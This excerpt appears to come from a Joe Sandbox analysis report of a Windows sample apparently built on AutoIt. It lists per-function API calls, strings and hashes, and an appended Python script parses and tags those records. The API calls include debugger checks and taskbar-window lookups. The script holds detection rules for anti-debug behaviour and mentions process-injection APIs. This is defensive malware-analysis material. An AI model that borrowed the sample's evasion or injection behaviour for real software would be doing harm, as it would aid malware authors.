                                                        • Opcode ID: e9d34621bd3bd6dea62b4df756ed693500ae11767686a00c769ca3a3dde84fbb
                                                        • Instruction ID: 4478a7e888909b1b8fb8b67d6aab75587d80a64d42f39cbf996a5f6d0664510a
                                                        • Opcode Fuzzy Hash: e9d34621bd3bd6dea62b4df756ed693500ae11767686a00c769ca3a3dde84fbb
                                                        • Instruction Fuzzy Hash: 2B112B34604604AFCB20DF28CC80EA57BE6BF49320F148269FA699B3A1C775E941CF90
                                                        APIs
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                          • Part of subcall function 0081AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0081AABC
                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00818E73
                                                        Strings
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        • Opcode ID: d9b0764d1afcb5d3ef5d498347f9542e8645dac6287a8be2f52a90c315c71d14
                                                        • Instruction ID: a0d1b848b6f6248318b8ed0c09ac329ebd3d705a8c5a1cf4f5ff559dbdfafe91
                                                        • Opcode Fuzzy Hash: d9b0764d1afcb5d3ef5d498347f9542e8645dac6287a8be2f52a90c315c71d14
                                                        • Instruction Fuzzy Hash: DA01F5B1601229EB8B18EBA4CC46DFE736CFF06360B14061DF836A72E1DE356848C651
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: __fread_nolock_memmove
                                                        • String ID: EA06
                                                        • API String ID: 1988441806-3962188686
                                                        • Opcode ID: b0dc8472f1a4fdc9827a92db1f6261f2c6a84b641ab828efcbd05ccfbed42975
                                                        • Instruction ID: 48c2301754d8e438aed237873f028c1d86d920a5a445bd5c883d340cbec10571
                                                        • Opcode Fuzzy Hash: b0dc8472f1a4fdc9827a92db1f6261f2c6a84b641ab828efcbd05ccfbed42975
                                                        • Instruction Fuzzy Hash: 8D01F971904258BEDF18CAA9C81AEFE7BF8DB15311F00459AF552D2181E878E60887A0
                                                        APIs
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                          • Part of subcall function 0081AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0081AABC
                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00818D6B
                                                        Strings
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        • Opcode ID: 77f3150b55f321474aedbc47d303b313d90b902d2d4fdd7d6183643240c456d3
                                                        • Instruction ID: 02f7295275862f3b2bb03919ad92c215a130965e814abed94e858c201aa47b80
                                                        • Opcode Fuzzy Hash: 77f3150b55f321474aedbc47d303b313d90b902d2d4fdd7d6183643240c456d3
                                                        • Instruction Fuzzy Hash: 0601D4B1B41209EBDB18EBA0C956EFE73ACEF15340F10002DB806E32E1DE255E48D672
                                                        APIs
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                          • Part of subcall function 0081AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0081AABC
                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00818DEE
                                                        Strings
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        • Opcode ID: cc6889623f0ea3382b72eec8a2e16872dd3f261625d72bb3b904eb90c427d9b9
                                                        • Instruction ID: 9aa158f58280de13e599ef9d11c999db05ba42743a33e45371a1625c854956dc
                                                        • Opcode Fuzzy Hash: cc6889623f0ea3382b72eec8a2e16872dd3f261625d72bb3b904eb90c427d9b9
                                                        • Instruction Fuzzy Hash: 2B01F7B1B41209E7CB14E6A4C946EFE73ACEF15340F10402DB806F3292DE255E48D672
                                                        APIs
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                        • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,007FB93A,?,?,?), ref: 0084C5F1
                                                          • Part of subcall function 007C25DB: GetWindowLongW.USER32(?,000000EB), ref: 007C25EC
                                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0084C5D7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$MessageProcSend
                                                        • String ID: 0R
                                                        • API String ID: 982171247-1916035689
                                                        • Opcode ID: b78b944e2460bf1a394c8447c8ceb0965784a16d0da18df176d91e0c30d769fa
                                                        • Instruction ID: 3256262243c447501dc02481a1e841b17accac3fda8bc278efa00d58cd56886e
                                                        • Opcode Fuzzy Hash: b78b944e2460bf1a394c8447c8ceb0965784a16d0da18df176d91e0c30d769fa
                                                        • Instruction Fuzzy Hash: 6101D835201208EBCB255F18DC48F6F3BA6FF85364F154129FA559B2E1CB31A812DB51
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp
                                                        • String ID: #32770
                                                        • API String ID: 2292705959-463685578
                                                        • Opcode ID: 2d4a69a64efa65013307b0bdb0325f0eaf5cb6faee12fbc82f405f6e9b00e855
                                                        • Instruction ID: 69fa3442308048fa48aa463d615e08831a19e7a916ad00f90a18160fba4f4afb
                                                        • Opcode Fuzzy Hash: 2d4a69a64efa65013307b0bdb0325f0eaf5cb6faee12fbc82f405f6e9b00e855
                                                        • Instruction Fuzzy Hash: 6CE092326042286AE7209BA9AC49AA7F7ACFB85B60F00006AFD14D3151E9649A558BE0
                                                        APIs
                                                          • Part of subcall function 007FB314: _memset.LIBCMT ref: 007FB321
                                                          • Part of subcall function 007E0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,007FB2F0,?,?,?,007C100A), ref: 007E0945
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,007C100A), ref: 007FB2F4
                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,007C100A), ref: 007FB303
                                                        Strings
                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 007FB2FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                        • API String ID: 3158253471-631824599
                                                        • Opcode ID: 16a2358ec13ae45845d53372df45214bddcca929c1cc6ec43197ffc7c9623338
                                                        • Instruction ID: 36f703420504df597734a8349159174c96dcb785bd8216eb2ac031aa46b8c277
                                                        • Opcode Fuzzy Hash: 16a2358ec13ae45845d53372df45214bddcca929c1cc6ec43197ffc7c9623338
                                                        • Instruction Fuzzy Hash: 51E039746007108BD7209F68D4087527AE4FF04368F01897DE556C6342EBB9A444CBA1
                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00801775
                                                          • Part of subcall function 0083BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0080195E,?), ref: 0083BFFE
                                                          • Part of subcall function 0083BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0083C010
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0080196D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                        • String ID: WIN_XPe
                                                        • API String ID: 582185067-3257408948
                                                        • Opcode ID: 02f69c1523ff2c70d5a6150a284030ce5ea8b5508beb1967fff01a9990243337
                                                        • Instruction ID: 33d9c7f222b3e7652426ad89c25d9cf7564407673e5e2133e372af5b56491ff1
                                                        • Opcode Fuzzy Hash: 02f69c1523ff2c70d5a6150a284030ce5ea8b5508beb1967fff01a9990243337
                                                        • Instruction Fuzzy Hash: D7F01570801008DFCB55DB94CD88AECBBB8FB08314F540099E102A2195D7308E84CF61
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008459AE
                                                        • PostMessageW.USER32(00000000), ref: 008459B5
                                                          • Part of subcall function 00825244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008252BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 9bbd718dca7021305f3e0837000d61a50276d8eba4d5355a98738b7df5cc9bd3
                                                        • Instruction ID: 5c3def68d2d2de892d3cc396ae7f6c657814d7975c62fb15a69adbc1c21596ee
                                                        • Opcode Fuzzy Hash: 9bbd718dca7021305f3e0837000d61a50276d8eba4d5355a98738b7df5cc9bd3
                                                        • Instruction Fuzzy Hash: 41D0C9357C0311BAE6A4AB70AC0FF966614FB15B50F010829B359EA1D1D9E4A800CA54
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0084596E
                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00845981
                                                          • Part of subcall function 00825244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008252BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 5caa23483029c6a13ba02b38b0551c6b89bbc442679e75dd5627db596bbd0af2
                                                        • Instruction ID: 1409a7ea5aad3f5b221e95980da6879b23edd0c7b149611bea595120a6ac054c
                                                        • Opcode Fuzzy Hash: 5caa23483029c6a13ba02b38b0551c6b89bbc442679e75dd5627db596bbd0af2
                                                        • Instruction Fuzzy Hash: AFD0C9357C4311B6E6A4AB70AC0FF966A14FB11B50F010829B359EA1D1D9E49800CA54
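The function records above follow a fixed layout (APIs, Strings, Memory Dump Source, Similarity) that can be triaged mechanically instead of read one record at a time. The Python script below is an added example; it is not part of the Joe Sandbox report and not code from the analysed sample. It parses three of the records shown above (copied verbatim into the script as sample input), turns each API line into a structured call with its module, arguments and reference address, keeps "Part of subcall function" entries apart as indirect calls, and attaches behaviour tags. The tag names and the rules behind them are this example's own assumptions. One rule deserves a caveat: the IsDebuggerPresent/OutputDebugStringW pair sits next to the string "ERROR : Unable to initialize critical section in CAtlBaseModule", which names the ATL CAtlBaseModule class, so that routine is ATL runtime initialisation compiled into the AutoIt interpreter rather than payload logic, and a signature such as "Contains functionality to check if a debugger is running (IsDebuggerPresent)" should not be weighted on it. Grouping by "API String ID" also shows that the two FindWindowW(Shell_TrayWnd) callers share one API/string signature but differ in Opcode ID, which is how near-duplicate routines appear in this report format.

```python
"""Triage helper for Joe Sandbox per-function records (added example, not report output)."""
import re
from collections import defaultdict

# Sample input: three records copied from the report section above.
SAMPLE = """\
APIs
  • Part of subcall function 007FB314: _memset.LIBCMT ref: 007FB321
  • Part of subcall function 007E0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,007FB2F0,?,?,?,007C100A), ref: 007E0945
• IsDebuggerPresent.KERNEL32(?,?,?,007C100A), ref: 007FB2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,007C100A), ref: 007FB303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 007FB2FE
Memory Dump Source
• Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 3158253471-631824599
• Opcode ID: 16a2358ec13ae45845d53372df45214bddcca929c1cc6ec43197ffc7c9623338
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008459AE
• PostMessageW.USER32(00000000), ref: 008459B5
  • Part of subcall function 00825244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008252BC
Strings
Memory Dump Source
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 9bbd718dca7021305f3e0837000d61a50276d8eba4d5355a98738b7df5cc9bd3
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0084596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00845981
  • Part of subcall function 00825244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008252BC
Strings
Memory Dump Source
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 5caa23483029c6a13ba02b38b0551c6b89bbc442679e75dd5627db596bbd0af2
"""

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Similarity")

# "Name.MODULE(args), ref: ADDR", optionally prefixed by the subcall marker;
# "_memset.LIBCMT ref: ..." has neither parentheses nor the comma.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
FIELD_RE = re.compile(r"^(?P<key>[^:]+): (?P<value>.*)$")


def parse_records(text):
    """Split the report text into per-function records (one per 'APIs' header)."""
    records, section, rec = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                rec = {"direct": [], "indirect": [], "strings": [], "meta": {}}
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith("• "):
            continue
        body = line[2:]
        if section == "APIs":
            m = API_RE.match(body)
            if not m:
                continue
            call = {"name": m["name"], "module": m["module"], "ref": m["ref"],
                    "args": [a for a in (m["args"] or "").split(",") if a]}
            (rec["indirect"] if m["caller"] else rec["direct"]).append(call)
        elif section == "Strings":
            rec["strings"].append(body.split(", xrefs:")[0])
        elif section == "Similarity":
            m = FIELD_RE.match(body)
            if m:
                rec["meta"][m["key"]] = m["value"]
    return records


def tag_record(rec):
    """Behaviour tags for one record. Tag names and rules are this example's assumptions."""
    names = {c["name"] for c in rec["direct"] + rec["indirect"]}
    direct_args = {a for c in rec["direct"] for a in c["args"]}
    tags = set()
    if {"IsDebuggerPresent", "OutputDebugStringW", "OutputDebugStringA"} & names:
        tags.add("anti-debug-api")
    if "FindWindowW" in names and "Shell_TrayWnd" in direct_args:
        tags.add("taskbar-window-lookup")
    if "PostMessageW" in names and "00000111" in direct_args:  # 0x111 is WM_COMMAND
        tags.add("posts-wm-command")
    if any("CAtlBaseModule" in s for s in rec["strings"]):
        tags.add("atl-runtime-init")  # ATL library boilerplate, not payload logic
    return tags


def triage(text):
    """Return tagged records plus a map of API String ID -> Opcode IDs sharing it."""
    records = parse_records(text)
    by_signature = defaultdict(list)
    for rec in records:
        rec["tags"] = tag_record(rec)
        by_signature[rec["meta"].get("API String ID")].append(rec["meta"].get("Opcode ID", ""))
    return records, dict(by_signature)


if __name__ == "__main__":
    recs, groups = triage(SAMPLE)
    for r in recs:
        print(r["meta"].get("Opcode ID", "")[:12], sorted(r["tags"]),
              [c["name"] for c in r["direct"]])
    for sig, opcodes in groups.items():
        if len(opcodes) > 1:
            print("shared API String ID", sig, "->", [o[:12] for o in opcodes])
```

Running the script on a full report export works the same way: paste the function section into SAMPLE or read it from a file, then extend tag_record with the rules that matter for the case at hand (for this sample, the process-injection APIs listed in the signature summary would be the next candidates).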